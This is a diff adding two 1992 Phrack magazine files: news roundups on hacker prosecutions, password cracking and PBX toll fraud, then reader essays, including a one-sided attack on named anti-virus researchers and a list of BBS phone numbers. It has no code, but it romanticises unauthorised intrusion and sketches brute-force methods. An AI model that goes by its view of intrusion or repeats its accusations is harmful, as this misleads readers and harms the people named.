+To prevent being detected, unauthorized computer users "loop and weave" through 
+computer networks at various locations in the process of getting information.
+
+"A lot of it is clearly for curiosity, the challenge of breaking into systems,"
+Mr. Settle said.  "The problem is that they can take control of the system."
+
+Also, said Mr. Owens, computer hackers who steal such information from
+commercial data banks may turn to extortion as a way to make money.
+
+Mr. Settle said there are also "indications" that computer criminals are
+getting involved in industrial espionage.
+
+The five hackers indicted in New York on conspiracy, computer-fraud, computer
+tampering, and wire-fraud charges called themselves "MOD," for Masters of
+Deception or Masters of Disaster.
+
+The hackers were identified in court papers as Julio Fernandez, 18, John Lee,
+21, Mark Abene, 20, Elias Ladopoulos, 22, and Paul Stira, 22.  All live in the
+New York City area.
+
+Mr. Fernandez and Mr. Lee intercepted data communications from a computer
+network operated by the Bank of America, court papers said.
+
+They also penetrated a computer network of the Martin Marietta Electronics
+Information and Missile Group, according to the court documents.
+
+The hackers obtained personal information stored in credit bureau computers,
+with the intention of altering it "to destroy people's lives or make them look
+like saints," the indictment stated.
+_______________________________________________________________________________
+
+ And Today's Password Is...                                        May 26, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Robert Matthews (The Daily Telegraph)(page 26)
+
+                  "Ways Of Keeping Out The Determined Hacker"
+
+One of the late Nobel Prize-winning physicist Richard Feynman's favorite
+stories was how he broke into top-secret atomic bomb files at Los Alamos by
+guessing that the lock combination was 271828, the first six digits of the
+mathematical constant "e".  Apart from being amusing, Feynman's anecdote stands
+as a warning to anyone who uses dates, names or common words for their computer
+password.
+
+As Professor Peter Denning, of George Mason University, Virginia, points out in
+American Scientist, for all but the most trivial secrets, such passwords simply
+aren't good enough.  Passwords date back to 1960, and the advent of time-
+sharing systems that allowed lots of users access to files stored on a central
+computer.  It was not long before the standard tricks for illicitly obtaining
+passwords emerged:  Using Feynman-style educated guessing, standing behind
+computer users while they typed in their password or trying common system
+passwords like "guest" or "root".  The biggest security nightmare is, however,
+the theft of the user-password file, which is used by the central computer to
+check any password typed in.
+
+By the mid-1970s, ways of tackling this had been developed.  Using so-called
+"one-way functions", each password was encrypted in a way that cannot be
+unscrambled.  The password file then contains only apparently meaningless
+symbols, of no obvious use to the would-be hacker.  But, as Denning warns, even
+this can be beaten if passwords are chosen sloppily.  Instead of trying to
+unscramble the file, hackers can simply feed common names and dates -- or even
+the entire English dictionary -- through the one-way function to see if the end
+result matches anything on the scrambled password file.  Far from being a
+theoretical risk, this technique was used during the notorious Project
+Equalizer case in 1987, when KGB-backed hackers in Hanover broke the passwords
+of Unix-based computers in America.
+
+Ultimately, the only way to solve the password problem is to free people of
+their fear of forgetting more complex ones.  The long-term solution, says
+Denning, probably lies with the use of smart-card technology.  One option is a
+card which generates different passwords once a minute, using a formula based
+on the time given by an internal clock.  The user then logs on using this
+password.  Only if the computer confirms that the password corresponds to the
+log-on time is the user allowed to continue.  Another smart-card technique is
+the "challenge-response" protocol.  Users first log on to their computer under
+their name, and are then "challenged" by a number appearing on the screen.
+Keying this into their smart card, a "response number" is generated by a
+formula unique to each smart card.  If this number corresponds to the response
+expected from a particular user's smart card, the computer allows access.  A
+number of companies are already marketing smart-card systems, although the
+technology has yet to become popular.
+
+In the meantime, Denning says that avoiding passwords based on English words
+would boost security.  He highlights one simple technique for producing non-
+standard words that are nonetheless easy to remember: "Pass-phrases".  For
+this, one merely invents a nonsensical phrase like "Martin says Unix gives gold
+forever", and uses the first letter of each word to generate the password:
+MSUGGF.  Such a password will defeat hackers, even if the password file is
+stolen, as it does not appear in any dictionary.  However, Denning is wary of
+giving any guarantees.  One day, he cautions, someone may draw up a
+computerized dictionary of common phrases.  "The method will probably be good
+for a year or two, until someone who likes to compile these dictionaries starts
+to attack it."
+_______________________________________________________________________________
+
+ Outgunned "Computer Cops" Track High-Tech Criminals               June 8, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Tony Rogers (Associated Press)
+
+BOSTON -- The scam was simple.  When a company ordered an airline ticket on its
+credit card, a travel agent entered the card number into his computer and
+ordered a few extra tickets.
+
+The extra tickets added up and the unscrupulous agent sold them for thousands
+of dollars.
+
+But the thief eventually attracted attention and authorities called in Robert
+McKenna, a prosecutor in the Suffolk County district attorney's office.  He is
+one of a growing, but still outgunned posse of investigators who track high-
+tech villains.
+
+After the thief put a ticket to Japan on a local plumbing company's account, he
+was arrested by police McKenna had posing as temporary office workers.  He was
+convicted and sentenced to a year in prison.
+
+But the sleuths who track high-tech lawbreakers say too many crimes can be
+committed with a computer or a telephone, and too few detectives are trained to
+stop them.
+
+"What we've got is a nuclear explosion and we're running like hell to escape
+the blast.  But it's going to hit us," said Chuck Jones, who oversees high-tech
+crime investigations at the California Department of Justice.
+
+The problem is, investigators say, computers have made it easier to commit
+crimes like bank fraud.  Money transfers that once required signatures and
+paperwork are now done by pressing a button.
+
+But it takes time to train a high-tech enforcer.
+
+"Few officers are adept in investigating this, and few prosecutors are adept
+in prosecuting it," Jones said.
+
+"You either have to take a cop and make him a computer expert, or take a
+computer expert and make him a cop.  I'm not sure what the right approach is."
+
+In recent high-tech crimes:
+
+- Volkswagen lost almost $260 million because of an insider computer scam
+  involving phony currency exchange transactions.
+
+- A former insurance firm employee in Fort Worth, Texas, deleted more than
+  160,000 records from the company's computer. 
+
+- A bank employee sneaked in a computer order to Brinks to deliver 44
+  kilograms of gold to a remote site, collected it, then disappeared.
+
+Still, computer cops have their successes.
+
+The Secret Service broke up a scheme to make counterfeit automatic teller
+machine cards that could have netted millions.
+
+And Don Delaney, a computer detective for the New York State Police, nabbed
+Jaime Liriano, who cracked a company's long-distance phone system.
+
+Many company phone systems allow employes to call an 800 number, punch in a
+personal identification number and then make long-distance calls at company
+expense.
+
+Some computer hackers use automatic speed dialers -- known as "demon dialers"
+-- to dial 800 numbers repeatedly and try different four-digit numbers until
+they crack the ID codes.  Hackers using this method stole $12 million in phone
+service from NASA.
+
+Liriano did it manually, calling the 800 number of Data Products in
+Wallingford, Connecticut, from his New York City apartment.  He cracked the
+company's code in two weeks.
+
+Liriano started selling the long distance service -- $10 for a 20-minute call
+anywhere -- and customers lined up inside his apartment.
+
+But Delaney traced the calls and on March 10, he and his troopers waited
+outside Liriano's apartment.  On a signal from New York Telephone, which was
+monitoring Liriano's line, the troopers busted in and caught him in the act.
+
+Liriano pleaded guilty to a misdemeanor of theft of services, and was
+sentenced to three years' probation and community service.
+
+Data Products lost at least $35,000.  "And we don't know what he made,"
+Delaney said of Liriano.
+_______________________________________________________________________________
+
+ Who Pays For Calls By Hackers?                                   June 12, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Kent Gibbons (The Washington Times)(Page C1)
+
+ICF International Inc. doesn't want to pay $82,000 for unauthorized calls by
+hackers who tapped the company's switchboard.
+
+AT&T says the Fairfax engineering firm owns the phone system and is responsible
+for the calls, mostly to Pakistan.
+
+Now their dispute and others like it are in Congress' lap.  A House
+subcommittee chairman believes a law is needed to cap the amount a company can
+be forced to pay for fraudulent calls, the same way credit card users are
+protected.
+
+Edward Markey, the Massachusetts Democrat who held hearings on the subject
+said long-distance carriers and local telephone companies should absorb much of
+those charges.
+
+Victims who testified said they didn't know about the illegal calls until the
+phone companies told them, sometimes weeks after strange calling patterns
+began.  But since the calls went through privately owned switchboards before
+entering the public telephone network, FCC rules hold the switchboard owners
+liable.
+
+"This is one of the ongoing dilemmas caused by the breakup of AT&T," Mr. Markey
+said.  Before the 1984 Bell system breakup, every stage of a call passed
+through the American Telephone & Telegraph Co. network and AT&T was liable for
+fraudulent calls.
+
+Estimates of how much companies lose from this growing form of telephone fraud
+range from $300 million to more than $2 billion per year.
+
+The range is so vast because switchboard makers and victims often don't report
+losses to avoid embarrassment or further fraud, said James Spurlock of the
+Federal Communications Commission.
+
+Long-distance carriers say they have stepped up their monitoring of customer
+calls to spot unusual patterns such as repeated calls to other countries in a
+short period.  In April, Sprint Corp. added other protective measures,
+including, for a $100 installation charge and $100 monthly fee, a fraud
+liability cap of $25,000 per incident.
+
+AT&T announced a similar plan last month.
+
+Robert Fox, Sprint assistant vice president of security, said the new plans cut
+the average fraud claim from more than $20,000 in the past to about $2,000
+during the first five months of this year.
+
+But the Sprint and AT&T plans don't go far enough, Mr. Markey said.
+
+ICF's troubles started in March 1988.  At the time, the portion of ICF that was
+hit by the fraud was an independent software firm in Rockville called Chartways
+Technologies Inc.  ICF bought Chartways in April 1991.
+
+As with most cases of fraud afflicting companies with private phone systems,
+high-tech bandits broke into the Chartways switchboard using a toll-free number
+set up for the company's customers.
+
+Probably aided by a computer that randomly dials phone numbers, the hackers
+got through security codes to obtain a dial tone to make outside calls.
+
+The hackers used a fairly common feature some companies offer out-of-town
+employees to save on long-distance calls.  Ironically, Chartways never used the
+feature because it was too complicated, said Walter Messick, ICF's manager of
+contract administration.
+
+On March 31, AT&T officials told Chartways that 757 calls were made to Pakistan
+recently, costing $42,935.
+
+The phone bill arrived later that day and showed that the Pakistan calls had
+begun 11 days before, Mr.Messick said.
+
+Because of the Easter holiday and monitoring of calls by Secret Service agents,
+ICF's outside-calling feature was not disconnected until April 4.  By then, ICF
+had racked up nearly $82,000 in unauthorized calls.
+
+A year ago, the FCC's Common Carrier Bureau turned down ICF's request to erase
+the charges.  The full commission will hear an appeal this fall.
+_______________________________________________________________________________
+
+ Dutch Hackers Feel Data Security Law Will Breed Computer Crime    July 7, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Oscar Kneppers (ComputerWorld Netherland)
+
+HAARLEM, the Netherlands -- Dutch hackers will be seriously reprimanded for
+breaking and entering computer systems, if a new law on computer crime is
+passed in the Netherlands.
+
+Discussed recently in Dutch parliament and under preparation for more than two
+years, the proposed law calls hacking "a crime against property."  It is
+expected to be made official in next spring at the earliest and will consist of
+the following three parts:
+
+-  The maximum penalty for hackers who log on to a secured computer system
+   would be six months' imprisonment.
+
+-  If they alter data in the system, they could spend up to four years in
+   prison.
+
+- Those who illegally access a computer system that serves a "common use" --
+  like that in a hospital or like a municipal population database -- could soon
+  risk a prison sentence of six years.
+
+This pending law does not differentiate between computer crimes committed
+internally or externally from an office.  For example, cracking the password of
+a colleague could lead to prosecution.
+
+Hackers believe this law will only provoke computer crime, because the hackers
+themselves will no longer offer "cheap warnings" to a computer system with poor
+security.
+
+Rop Gonggrijp, who is sometimes called the King of Hacking Holland, and is
+currently editor-in-chief of Dutch computer hacker magazine "Hack-tic" warns
+that this law could produce unexpected and unwanted results.
+
+"Students who now just look around in systems not knowing that it [this
+activity] is illegal could then suddenly end up in jail," he said.  Gonggrijp
+equates hacking to a big party, where you walk in uninvited.
+
+Gonggrijp is concerned about the repercussions the new law may have on existing
+hackers.  He said he thinks the current relationship between computer hackers
+and systems managers in companies is favorable.  "[Hackers] break into, for
+example, an E-mail system to tell the systems manager that he has to do
+something about the security.  If this law is introduced, they will be more
+careful with that [move].  The cheap warning for failures in the system will,
+therefore, no longer take place, and you increase chances for so-called real
+criminals with dubious intentions," he added.
+
+According to a spokesman at the Ministry of Justice in The Hague, the law gives
+the Dutch police and justice system a legal hold on hackers that they currently
+lack.
+
+"Computer criminals [now] have to be prosecuted via subtle legal tricks and
+roundabout routes.  A lot of legal creativity was [previously] needed.  But
+when this law is introduced, arresting the hackers will be much easier," he
+said.
+
+The Dutch intelligence agency Centrale Recherche Informatiedienst (CRI) in The
+Hague agreed with this.  Ernst Moeskes, CRI spokesman, said, "It's good to see
+that we can handle computer crime in a directed way now."
+_______________________________________________________________________________
+
+ PWN Quicknotes
+ ~~~~~~~~~~~~~~
+1.  Printer Avoids Jail In Anti-Hacking Trial (By Melvyn Howe, Press
+    Association Newsfile, June 9, 1992) -- A printer avoided a jail sentence
+    in Britain's first trial under anti-hacking legislation.  Freelance
+    typesetter Richard Goulden helped put his employers out of business with a
+    pirate computer program -- because he said they owed him L2,275 in back
+    pay.  Goulden, 35, of Colham Avenue, Yiewsley, west London, was
+    conditionally discharged for two years after changing his plea to guilty on
+    the second day of the Southwark Crown Court hearing.  He was ordered to pay
+    L1,200 prosecution costs and L1,250 compensation to the company's
+    liquidators.  Goulden had originally denied the charge of unauthorized
+    modification of computer material under the 1990 Computer Misuse Act.
+    After his change of plea Judge John Hunter told him:  "I think it was plain
+    at a very early stage of these proceedings that you had no defence to this
+    allegation." Mr. Warwick McKinnon, prosecuting, told the jury Goulden added
+    a program to a computer belonging to Ampersand Typesetters, of Camden,
+    north-west London, in June last year which prevented the retrieval of
+    information without a special password.  Three months later the company
+    "folded".  Mr Jonathan Seitler, defending, said Goulden had changed his
+    plea after realizing he had inadvertently broken the law.
+_______________________________________________________________________________
+
+2. ICL & GM Hughes In Joint Venture To Combat Computer Hackers (Extel Examiner,
+   June 15, 1992) -- General Motors Corporation unit, Hughes STX, and ICL have
+   set up a joint venture operation offering ways of combating computer
+   hackers.  Hughes STX is part of GM's GM Hughes Electronics Corporation
+   subsidiary.  ICL is 80% owned by Fujitsu.  Industry sources say the venture
+   could reach $100 million in annual sales within four years.
+_______________________________________________________________________________
+
+3.  Another Cornell Indictment (Ithaca Journal, June 17, 1992) -- Mark Pilgrim,
+    David Blumenthal, and Randall Swanson -- all Cornell students -- have each
+    been charged with 4 felony counts of first-degree computer tampering, 1
+    count of second-degree computer tampering, and 7 counts of second-degree
+    attempted computer tampering in connection with the release of the MBDF
+    virus to the Internet and to various BBSs.
+
+    David Blumenthal has also been charged with two counts of second-degree
+    forgery and two counts of first-degree falsifying business records in
+    connection with unauthorized account creation on Cornell's VAX5 system.  He
+    was also charged with a further count of second-degree computer tampering
+    in connection with an incident that occurred in December of 1991.
+_______________________________________________________________________________
+
+4. Computer Watchdogs Lead Troopers To Hacker (PR Newswire, July 17, 1992) --
+   Olympia, Washington -- State Patrol detectives served a search warrant at an
+   East Olympia residence Thursday evening, July 16, and confiscated a personal
+   computer system, programs and records, the Washington State Patrol said.
+
+   The resident, who was not on the premises when the warrant was served, is
+   suspected of attempts to break into computer files at the Department of
+   Licensing and the State Insurance Commissioner's office.
+
+   The "hacker's" attempts triggered computerized security devices which
+   alerted officials someone was attempting to gain access using a telephone
+   modem.  Patrol detectives and computer staff monitored the suspect's
+   repeated attempts for several weeks prior to service of the warrant.
+
+   Placement of a telephone call by a non-recognized computer was all that was
+   required to trigger the security alert.  The internal security system then
+   stored all attempted input by the unauthorized user for later retrieval and
+   use by law enforcement.  Integrity of the state systems was not breached.
+
+   The investigation is continuing to determine if several acquaintances may be
+   linked to the break in.  Charges are expected to be filed as early as next
+   week in the case.
+
+   CONTACT: Sgt. Ron Knapp of the Washington State Patrol, (206)459-6413
+_______________________________________________________________________________
+
+5. UPI reports that the 313 NPA will split to a new 810 NPA effective
+   August 10, 1994.
+
+   Oakland, Macomb, Genesee, Lapeer, St. Clair and Sanilac counties as well as
+   small sections of Saginaw, Shiawassee and Livingston counties will go into
+   810.  Wayne, Washtenaw, Monroe, and small parts of Jackson and Lenawee
+   counties will remain in 313.  The city of Detroit is in Wayne County and
+   won't change.
+_______________________________________________________________________________
diff --git a/phrack40/2.txt b/phrack40/2.txt
new file mode 100644
index 0000000..353566a
--- /dev/null
+++ b/phrack40/2.txt
@@ -0,0 +1,1009 @@
+                                ==Phrack Inc.==
+
+                     Volume Four, Issue Forty, File 2 of 14
+
+                          [-=:< Phrack Loopback >:=-]
+
+                            By Dispater & Mind Mage
+
+     Phrack Loopback is a forum for you, the reader, to ask questions, air
+problems, and talk about what ever topic you would like to discuss.  This is
+also the place Phrack Staff will make suggestions to you by reviewing various
+items of note; magazines, software, catalogs, hardware, etc.
+
+In this issue:
+
+     Retirement of a Hacker             : Jester Sluggo
+     Truth Is Out Of Style              : Dispater
+     Tim Foley Virus                    : Guido Sanchez
+     The Hacker Files (from DC Comics)  : Newsbytes
+     Sneakers (from Universal Pictures) : Press Release
+     Pirates v. AT&T: Posters           : Legacy Irreverent and Captain Picard
+     Telco Trashing Yields Big Rewards  : Anonymous
+     Anonymous Mail On IBM VM Systems?  : Apollo
+     WWIV Link Hack                     : Mr. Bigg
+     The Day Bell System Died           : Anonymous
+     The 1992 Consumer Electronics Show : Sarlo
+
+_______________________________________________________________________________
+
+                                    x  x  x
+                                    |  |  |
+                                 +------------+
+                                 | Retirement |
+                                 |    of a    |
+                                 |   Hacker   |
+                             +---+------------+---+
+                             |  by Jester Sluggo  |
+                           +-+--------------------+-+
+                           | Released: July 9, 1992 |
+                           +------------------------+
+
+I would like to begin by saying "Hello" to all readers of this file, but
+unfortunately it will be my last time.  I've been a member of the "hacker
+underground" for over a decade and am one of the few extremely lucky hackers
+who has successfully hacked a great number of computer systems, phone systems,
+and other technologies, yet has never been caught.  I wish to take this last
+opportunity to reflect on my experiences, and express many personal views,
+because although there are feelings of sadness, it is my pleasure to announce
+my formal retirement from this "underground" community.
+
+My decision to retire has been a carefully planned path which began several
+years ago.  During the early 1980's, the innocence of hacking and exploring
+computer systems for my quest of knowledge was a great thrill.  Every system
+was like an unexplored door which lead to unlimited opportunities; various
+computer systems, operating systems, languages, networks, software, and data.
+
+But it was in the later part of the 1980's when I began to realize that I had
+to focus my interests, knowledge and experience towards a legitimate career.
+It's nearly impossible to earn a living solely within the resources of the
+hacker underground, and the idea of abusing technology for monetary gain is
+against the (unwritten) code of hacker ethics.  Also at this time, the
+innocence of exploring various systems was being replaced by the realities of
+ruining my entire future at such a young age if I was caught and convicted by
+the United States' legal system.
+
+The media and law-enforcement agencies have almost always been biased against
+hackers, and these are two powerful entities that influence society.  Hackers
+have always been presented in a negative context, whereas their discoveries,
+efforts, creativeness, and hard work have been ignored except among fellow
+hackers.  In a way, it's similar to how the U.S. government and corporations
+support research and development: A group of researchers discover, explore,
+refine, or exploit a certain technology over a period of many years, yet their
+efforts go unnoticed unless their research results in a product acceptable to
+society.  The researcher's results are shared, respected, and challenged among
+the scientific community and journals long before they ever result in a product
+(if they ever result in a product).  In the same way that researchers and
+scientists relentlessly pursue their interests, I pursued answers to my
+curiosities and interests.
+
+It is the groups that want to control the society (the legal system, and
+police) which have labeled "hackers" as notorious people.  Hackers can use
+technology to access a variety of information which was previously accessible
+only to these groups, and these controllers are afraid of losing their
+advantages and control.  Currently in US, the FBI is afraid of losing their
+ability to easily tap fiber optics so they're proposing to make it mandatory
+for central offices to make it easier for them.  If people knew how common
+illegal wiretaps occur, they'd be upset at the abuse of power.  Police are
+making illegal search and seizures, and district attorneys are filing
+outrageous affidavits to protect their control of power and access to
+information.
+
+It was in the middle to late 1980's when the legal system and law enforcement
+agencies increased efforts to severely penalize hackers, when the risk of
+getting caught began to outweigh the excitement of discovering.  It is
+unbelievably difficult to carry the burden of a "serious" criminal record
+throughout one's life when you're 20 years old (or for that matter 16 years
+old), as well as the eternal monetary debt which comes with these consequences.
+In the 1970's, the founders of Apple computer were caught selling Blue Boxes
+while they were in college and got off with a minimal fine.  With todays laws,
+the potential jail time, monetary damages, and lawyer fees, the system would
+have wasted and banned the brilliance of Steve Wozniak and Steve Jobs.  Apple
+Computer (and microcomputers) might not have been born (IBM would have loved
+that).
+
+Technology has changed faster than the legal system and society can adapt, so
+for now, unapproved exploring of these technologies has been declared a serious
+offense.  Society trusts the legal systems' judgement, but even in 1992 law-
+makers are just barely beginning to understand technology: "Is software
+patentable (do not confuse with copyrightable), and to what degree?", "What
+privacy and freedom of speech should we have with electronic mail and
+communications?"  Don't let unqualified law makers make decisions about
+technology-related issues that will affect you, without them knowing what you
+have to say. 
+
+So it was in the late 1980's when I began preparing for my retirement.  I
+outlined a set of goals and a plan to achieve them.  Unfortunately this plan
+required several years to fulfill, but I knew it was the right time of my life
+to begin this ambitious plan.  The goals I wanted to achieve were:
+
+        1) Pass the knowledge I've gained onto others.
+        2) Keep the "hacker" movement active.
+        3) Prepare myself to be legitimately successful so that I can help to
+           influence society's views about technology as a member of the
+           society.
+
+Due to the increasing danger of getting caught, and to become successful, I
+was forced to hide from the mainstream hacker community and make my actions and
+efforts unknown.  The first two goals were closely related and took slightly
+longer to complete than my original plan.  However, they were a much greater
+financial sacrifice than I ever imagined.  The third goal will probably require
+the rest of my lifetime, but it's a challenge I accept.
+
+To complete goals 1 and 2, I've spent the last 5 years preparing a "tomb" of
+information and knowledge used within the hacker community.  Not all of the
+information is complete, but neither is the seed that grows to become a tree.
+Anyone with a telephone can guess ("hack" according to the media and law
+enforcement) 4-digit passwords to telephone calling cards or PBX out-dial
+lines, but I wanted "real" hackers.  I talked and met with 100's of hackers
+world-wide to find the right individuals who can responsibly learn and append
+to this "tomb" -- people who have the desire, respect, effort and ability to
+encourage new generations of hackers.  This group has been selected and
+trained, and I feel they are some of the best prospects.  Their international
+mixing should give them an almost unlimited number of opportunities, and some
+protection.  I wish them the best of all luck in their endless journey of
+learning and knowledge.
+
+To become legitimately successful meant getting a respectable job.  Obviously,
+with my interests, I knew it would have to be in the high technology
+industries.  Unfortunately, getting a job interview or a job offer with these
+companies is difficult because the Human Resources departments always shun the
+hiring of hackers.  This is ironic, because many of the engineers and
+programmers within these companies are made of ex-hackers, or people who share
+a similar intense interest in technology.  Also, since some of best experiences
+of a hacker are discovered non-legitimately they can't be presented on a
+resume.
+
+My first step towards completing this goal was instinctive; to keep my
+excitement and enjoyment focused intensely on technology.  This may sound
+strange, but many hackers know friends who "burn out" on hacking or working 
+in the high-tech companies, and I didn't want to 'burn out' at 20 years of age,
+so I had to slow down my hacking activity. 
+
+The next step was getting a college education, which I've completed.  College
+is not the answer to everything... in fact it's not the answer to anything,
+however, college is an experience I wish everyone could experience -- it's a
+unique experience.  A college degree will not guarantee a job, but it might get
+you past the Human Resources department.  If you have the chance to attend
+college, don't miss this chance.  I realize employers prefer experienced
+workers over inexperienced "fresh" college graduates, but if you have a focused
+interest on a certain technology, then you will find a way to keep updating
+yourself while suffering through college.  And like me, you will find the
+college degree combined with the results of your focused efforts will open the
+best job opportunities to you.  Be focused and patient... it worked for me!
+
+I am currently working on the inside of a technology-related company, enjoying
+the work I do for a living.  In fact, sometimes I think to myself, "Wow, I get
+paid for doing this!?"  It's a thrill to be doing what I do, yet I must work
+hard, and continue working hard to achieve the highest position I am able to
+reach to make the most of my abilities.  In doing this, I hope someday to give
+something back to the non-hacking society which may show them that hackers are
+constructive to society, thus, changing their negative view which has labeled
+hackers synonymous to "criminals."  I would like to see mature, legitimately-
+successful hackers, form an interest group to help cultivate the energy of the
+younger hackers.
+
+Although I am retiring from the community, I can never retire the curiosity and
+intense interest I have about technology.  Instead, I now focus these aspects
+legitimately into my daily work and will continue to do so.  I've immensely
+enjoyed my involvement in the hacking community and will always treasure it.  I
+also hope to eventually persuade people to accept hackers and to not persecute
+them.  This last goal is the most ambitious goal, but I feel it's the most
+important goal, because those groups that control society are wasting a group
+of young and talented individuals who could be inventors of future
+technologies.  Now, I will formally say "goodbye" to my friends in the hacking
+community... but not for the last time.
+
+                                      Persevere,
+
+                                      Jester Sluggo
+_______________________________________________________________________________
+
+                            "Truth Is Out Of Style"
+
+          An Investigative Report Into Computer Security Corruption
+
+                                  by Dispater
+
+It seems that these days the anti-virus industry/community has brainwashed the
+public into thinking that any use of a modem will put you in contact with an
+unfathomable array of dangers.  It sounds like something your mom said, when
+she didn't want you to stay out after dark doesn't it?
+
+As it turns out the anti-virus community has all the moral fiber of television
+evangelists.  As they preach on about the horrors of accessing information
+(without purchasing one of their products), they are engaging in the activity
+that they claim should be made a federal offense, in Congress.  That is the
+"distribution of computer viruses.  Not only have they been involved in this
+type of activity since they industry began, but now there is a self proclaimed
+"elite" [smirk] group of so-called professionals within the industry that wish
+to keep a monopoly on the virus trade, by ruining the reputation and lives of
+independent researchers.  So in a way, we now have a "virus cartel" within the
+computer security industry.
+
+
+ The Little Black Book of Computer Viruses
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The Little Black Book of Computer Viruses is a printed text that has been
+around for a few years, but is finally making waves with people who think
+Prodigy and CompuServe are the best networks ever invented.  Anyway, this book
+contains printed out versions of viruses.  Gee, viruses are SO difficult for
+people to get their hands on aren't they?  Well, one of the information
+dinosaurs got his name in print for condemning such immorality.
+
+     "Professional virus fighters such as Alan Solomon at S&S
+     International are madder than angry hornets over the publication.
+     They are encouraging anti-black book campaigns that include
+     PICKETING THE AUTHOR'S HOUSE, boycotting shops that sell the book,
+     petitioning Congress, and even bringing in lawyers."
+     -- ComputerWorld, June 29, 1992, page 4 (emphasis added)
+
+Well isn't it interesting to note that while Mr. Solomon is encouraging
+personal and economic harassment of Mr. Ludwig, his close friend and business
+associate, Sarah Gordon is doing the dirty work for him.
+
+
+ The Con
+ ~~~~~~~
+The National Computer Security Association's 1st Annual Conference on Viruses
+took place in Washington, D.C. this past June.  Alan Solomon and Sarah Gordon
+were there in full force.  Gordon has often been referred to as being Solomon's
+sidekick and nowhere did she live up to this distinctive title more than at
+this conference.
+
+At the conference, Gordon purchased not one, but two copies of Ludwig's book
+and then immediately ran to the conference organizer to make a dramatic scene
+over how immoral it was for Mr. Ludwig to be selling such a thing.  As it turns
+out this is not the first time Sarah Gordon has engaged in such hypocritical
+behavior.
+
+Another interesting thing to note at the conference is the fact that one
+evening, Knight Lightning and a couple of others noticed some people sitting
+around a room and walked in out of curiosity to what was going on.  As it
+turned out what was going on was a "midnight meeting" of sorts.  KL and friends
+were asked to leave because "it was not appropriate that <they> be here."  Why
+wasn't it appropriate?  It's because what these people were doing was
+discussing the ways they were going to "take down bulletin boards" and damage
+people's career's who distribute viruses.
+
+Sometime after this conference, I learned about their plan to use "the media to
+ruin these sysops.  For example, to use influence with the media to call
+attention to this type of activity."  These people even went so far as to
+compile a list of BBSes that they wish to "take down."
+
+ The Hit List
+ ~~~~~~~~~~~~
+Phrack received anonymous mail containing the BBS "hit list" that the self-
+proclaimed "elite" group of modem vigilantes put together to target first.
+Upon our receipt of this list, Phrack staff members contacted the sysops of
+these boards and as a result, many of the numbers have since been changed.
+
+        +1-206-481-2728  The Festering Pit of Vile Excretions
+                         [This phone number belongs to a construction company
+                         called Custom Building Co.]
+        +1-213-274-1333  West Coast Technologies (Tymnet 311021300023)
+        +1-213-274-2222  DII
+        +1-213-PRI-VATE\
+                        )BBS-A-Holic
+        +1-ITS-PRI-VATE/
+        +1-301-PRI-VATE\
+                        )Digital Underground
+        +1-301-913-5915/
+        +1-301-948-7761  Cornerstone III
+                         [              ]
+        +1-305-669-1347  The Penthouse
+        +1-516-466-4620\
+                        )Hamburger Heaven: this was down for
+        +1-517-PRI-VATE/ software problems, was titled Sentinel's Gate
+        +1-602-491-0703  The Final Frontier
+        +1-708-541-1069  Pirate's Guild
+        +1-717-367-3501  Night Eyes
+        +1-818-831-3189  Pirate's Cove
+        +1-901-756-4756  Silicon Central
+        +1-916-729-2112  The Welfare Department
+                         [This is an insurance companies phone number]
+        +1-213-274-1333  West Coast Technologies (Tymnet 311021300023)
+        +1-213-274-aaaa  DII
+        +1-313-LIM-ITED  Canterbury Woods
+        +1-409-372-5511  The Crowbar Hotel
+        +1-514-PRI-VATE\
+                        )The Sacred Reich
+        +1-514-975-9362/
+        +1-516-328-0847  The Grave of the Lost
+        +1-516-541-6324  Realm of Heroes
+        +1-708-459-7267  Hell Pit
+        +1-713-464-9013  South of Heaven
+        +1-818-831-3189  Pirate's Cove
+        +1-819-PRI-VATE  Brain Damage
+
+It is unclear as to whom is directly responsible for the organization of this
+group or who is responsible for creating and distributing the list, however
+there were representatives from CERT, ISPNews, and several other well known
+individuals who are self-proclaimed security experts as well as a slew of
+nobodies who wish to make a name for themselves.
+
+
+ The Hell Pit BBS
+ ~~~~~~~~~~~~~~~~
+The Hell Pit is a BBS system in Chicago and operated by a sysop named Kato.
+Kato has a legitimate curiosity (as if a curiosity needs to be validated) about
+the inner-workings of viruses.  I shall let him relate his experience:
+
+   "I have been running The Hell Pit BBS for the past 3 years.  It's gone
+   through many phases in that time, but the most recent has been my affection
+   for computer viruses.  I became interested in viruses about one and a half
+   years ago and I set up a virus file base on my system.  At first I had a
+   mere 5 or 6 viruses that I had collected from a system in the area.  My
+   collection has grown to about 700 IBM computer viruses."
+
+   "It seems to be their objective to shut down my bulletin board system and
+   therefore eliminate my virus database.  Considering these anti-virus
+   personnel claim to be interested in aspects of computer security, I find
+   their tactics highly questionable.  There was recently a NCSA anti-virus
+   conference.  I learned from sources that one of the people attending the
+   conference [Sarah Gordon] had committed certain acts on my BBS.  This person
+   claimed to have called up, uploaded 3 fake viruses, gained access to my
+   virus database and then downloaded several viruses.  This is their proof
+   that I do not adequately control virus access on my system.  The anti-virus
+   personnel do not allow me to defend myself."
+
+   "Anti-virus personnel themselves have committed the same mistakes as I did,
+   probably much more often.  There is no set of rules that determines what
+   makes someone an anti-virus authority.  Certain people that seem to fit the
+   mold are allowed to exchange viruses with anti-virus personnel.  What are
+   the criteria for these people?  Is there any?  It has been my experience
+   that if you get involved with the right circles, you are considered an anti-
+   virus authority.  However, there are many places in the anti-virus community
+   for viruses to leak out.  For one thing, you can never be certain who you
+   are dealing with.  Just because someone is smart and claims to hold an anti-
+   virus attitude is no guarantee that that person isn't an "in the closet"
+   virus writer.
+
+   "At anti-virus conferences such as the NCSA anti-virus conference, guests
+   were exchanging viruses like they were baseball cards.  That isn't what I
+   would consider controlling access."
+
+   "They do help a lot of people with computer troubles.  However, to criticize
+   me for not properly controlling access to my collection of viruses is being
+   hypocritical."
+
+   "If anyone would like to call my system to check things out, feel free.  I
+   have a lot more to offer than just computer viruses.  I have a good number
+   of text files and some pretty active message bases.  The Hell Pit BBS -
+   (708)459-7267" - Kato
+
+
+ Conclusions
+ ~~~~~~~~~~~
